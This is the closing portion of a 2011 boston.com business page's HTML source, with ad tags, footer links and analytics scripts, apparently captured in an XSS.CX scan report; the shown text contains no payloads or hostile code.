<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR3');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR4');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR5');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR6');
//--></script><!--End Ad Tag--></div>
<div class="cf"></div>
</div>
<div>
<div id="bottomLinks">
<ul class="gnavContainer">
<li><a rel="nofollow" href="http://www.boston.com/">Home</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/globe/">Today's Globe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/">News</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/business/">Business</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/sports/">Sports</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/ae/">A&amp;E</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/thingstodo/">Things to Do</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/travel/">Travel</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/cars/" class="cfied">Cars</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/jobs/" class="cfied">Jobs</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/realestate/" class="cfied">Homes</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/search/" class="cfied">Local Search</a></li>
</ul>
<ul id="bcomLinks">
<li class="first"><a rel="nofollow" href="http://www.boston.com/help/bostoncom_info/">Contact Boston.com</a></li> <li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/">Help</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mediakit/bgm/index.html">Advertise</a></li><li class="listPipe">|</li>
<li><a href="http://boston.monster.com/search.aspx?q=%22boston.com%22&amp;cy=us&amp;cnme=boston&amp;sid=40&amp;re=100&amp;jto=1">Work here</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/privacy_policy/">Privacy Policy</a></li><li class="listPipe">|</li>
<li><script language="JavaScript"><!--
signupLink();
//--></script><noscript><a href="http://members.boston.com/reg/login.do?dispatch=loginpage&amp;p1=Foot_ContactBostonCom_Newsletters">Newsletters</a></noscript></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mobile/">Mobile</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/tools/rss/">RSS feeds</a></li><li class="listPipe">|</li>
<li><a href="http://spiderbites.boston.com/sitemap-service/Home.xml">Sitemap</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/homepage/">Make Boston.com your homepage</a></li>
</ul>
<ul id="bglobeLinks">
<li class="first"><a rel="nofollow" href="http://bostonglobe.com/aboutus/contact_us/default.aspx">Contact The Boston Globe</a></li><li class="listPipe">|</li>
<li><a href="http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278">Subscribe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/custserv.aspx?id=5274">Manage your subscription</a></li><li class="listPipe">|</li>
<li><a href="https://bostonglobe.com/advertiser/">Advertise</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/extras/index.aspx">The Boston Globe Extras</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://services.bostonglobe.com/globestore/category.cgi?category=0&amp;source=bcomfooter&amp;kw=bcomfooter1">The Boston Globe Store</a></li><li class="listPipe">|</li>
<li>&copy; <script> var crYear = new Date(); document.write(crYear.getFullYear());</script> NY Times Co.</li>
</ul>
</div>

</div>

</div>
</div>
</div>
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUP');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUN');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('EXTRA');
//--></script><!--End Ad Tag-->
<!-- SiteCatalyst code version: G.5. Copyright 1997-2003 Omniture, Inc. More info available at http://www.omniture.com --><script
language="JavaScript"><!--
var s_pageName='Business | Markets | Financial Content (all)',s_channel='Business',s_prop1='Business | Markets';
var s_server='',s_pageType='',s_prop2='',s_prop3='',s_prop4='',s_prop5='',s_prop6='Financial Content page',s_prop7='',s_prop8='',s_prop9='',s_prop10='';
/* E-commerce Variables */
var s_campaign='',s_state='',s_zip='',s_events='',s_products='',s_purchaseID='',s_eVar1='',s_eVar2='',s_eVar3='',s_eVar4='',s_eVar5='',s_eVar6='',s_eVar7='',s_eVar8='',s_eVar9='',s_eVar10='';
var s_code='' ;
//--></script>
<script language="JavaScript" src="http://cache.boston.com/omniture/s_code.js"></script>

<script language="JavaScript"><!--
var s_wd=window,s_tm=new Date;if(s_code!=' '){s_code=s_dc('nytbglobe');if(s_code)document.write(s_code);}else document.write('<im'+'g src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--FB/s'+s_tm.getTime()+'?[AQB]'+'&j=1.0&[AQE]" height="1" width="1" border="0" alt="" />');
//--></script><script language="JavaScript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-');
//--></script><noscript><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--NS/0" height="1" width="1" border="0" alt="" /></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: G.5. -->
<!--Tacoda-->
<script language="JavaScript"><!--
var tcdacmd='dt;da;sc=Business | Markets';
//--></script>
<script src="http://an.tacoda.net/an/13651/slf.js" language="JavaScript"></script>
<!--End Tacoda-->

</body>
</html>




Report generated by XSS.CX at Thu Mar 17 08:38:59 CDT 2011.